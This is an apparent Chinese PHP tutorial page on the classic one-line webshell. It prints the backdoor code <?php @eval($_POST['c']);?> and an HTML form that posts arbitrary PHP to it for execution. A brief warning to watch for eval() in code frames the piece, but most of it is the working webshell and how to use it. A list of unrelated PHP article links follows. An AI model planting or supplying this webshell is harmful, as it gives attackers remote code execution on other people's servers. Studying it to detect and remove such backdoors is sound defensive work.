這個(gè)是php常見的一句話木馬的源碼，通過post木馬程序來實(shí)現(xiàn)木馬的植入，eval()函數(shù)把字符串按照PHP代碼來計(jì)算。該字符串必須是合法的PHP代碼，且必須以分號結(jié)尾。如果沒有在代碼字符串中調(diào)用return語句，則返回NULL。如果代碼中存在解析錯(cuò)誤，則eval()函數(shù)返回false。

eval可以用來執(zhí)行任何其他php代碼，所以對于代碼里發(fā)現(xiàn)了eval函數(shù)一定要小心，可能是木馬

就這一句話害死人，這樣任何人都可以post任何文件上來，所以要做好防范

<?php @eval($_POST['c']);?>

使用方法也很簡單，本地提交文件指向提交文件，里面的php代碼就會(huì)被執(zhí)行

<html> 
<body> 
<form action="a.php" method="post"> 
<input type="text" name="c" value="phpinfo();"> 
<input type="submit" value="submit"> 
</form> 
</body> 
</html>

以上所述就是本文的全部內(nèi)容了，希望大家能夠喜歡。

您可能感興趣的文章:

相關(guān)文章

PHP中常用數(shù)組處理方法實(shí)例分析
把php中常用的幾種處理數(shù)組的方法都整理了下，方便了大家學(xué)習(xí)，大家可以逐個(gè)去運(yùn)行下，熟悉php數(shù)組的使用
2008-08-08
php實(shí)現(xiàn)四舍五入的方法小結(jié)
這篇文章主要介紹了php實(shí)現(xiàn)四舍五入的方法,實(shí)例總結(jié)了php實(shí)現(xiàn)四舍五入的三種常用方法,具有一定參考借鑒價(jià)值,需要的朋友可以參考下
2015-03-03
PHP循環(huán)與分支知識點(diǎn)梳理
涉及到一些比較復(fù)雜的邏輯，分支與循環(huán)是必不可少的。通過分支和循環(huán)的結(jié)合使用可以使業(yè)務(wù)更加復(fù)雜，代碼功能更加強(qiáng)大，這篇文章主要介紹了PHP循環(huán)與分支知識點(diǎn)
2022-11-11
php連接微軟MSSQL(sql server)完全攻略
在研究ezSQL的時(shí)候就看到了mssql_connect()等一些php提供的連接MSSQL的函數(shù)，本以為php這個(gè)開源的風(fēng)靡世界的編程語言對連接微軟的數(shù)據(jù)應(yīng)該是不在話下的，但是到真正執(zhí)行的時(shí)候，才發(fā)現(xiàn)困難多多
2016-11-11
php中數(shù)字0和空值的區(qū)別分析
這篇文章主要介紹了php中數(shù)字0和空值的區(qū)別分析,用一個(gè)實(shí)例來供大家調(diào)戲,需要的朋友可以參考下
2014-06-06
PHP SOCKET編程詳解
這篇文章主要介紹了PHP SOCKET編程詳解,需要的朋友可以參考下
2015-05-05
解決了Ajax、MySQL 和 Zend Framework 的亂碼問題
功夫不負(fù)有心人，花了將近一天時(shí)間，終于解決了Ajax 、MySQL 和 Zend Framework 的亂碼問題?，F(xiàn)在總結(jié)如下，以供參考。
2009-03-03
php采用curl實(shí)現(xiàn)偽造IP來源的方法
這篇文章主要介紹了php采用curl實(shí)現(xiàn)偽造IP來源的方法,主要涉及使用curl的CURLOPT_REFERER參數(shù)實(shí)現(xiàn)該功能,需要的朋友可以參考下
2014-11-11
php自定義函數(shù)實(shí)現(xiàn)JS的escape的方法示例
這篇文章主要介紹了php自定義函數(shù)實(shí)現(xiàn)JS的escape的方法,結(jié)合完整實(shí)例形式分析了php實(shí)現(xiàn)JS的escape功能函數(shù)的相關(guān)技巧,具有一定參考借鑒價(jià)值,需要的朋友可以參考下
2016-07-07
ThinkPHP開發(fā)框架函數(shù)詳解：C方法
這篇文章主要給大家講解ThinkPHP開發(fā)框架函數(shù)詳解：C方法，有需要的朋友可以參考下
2015-08-08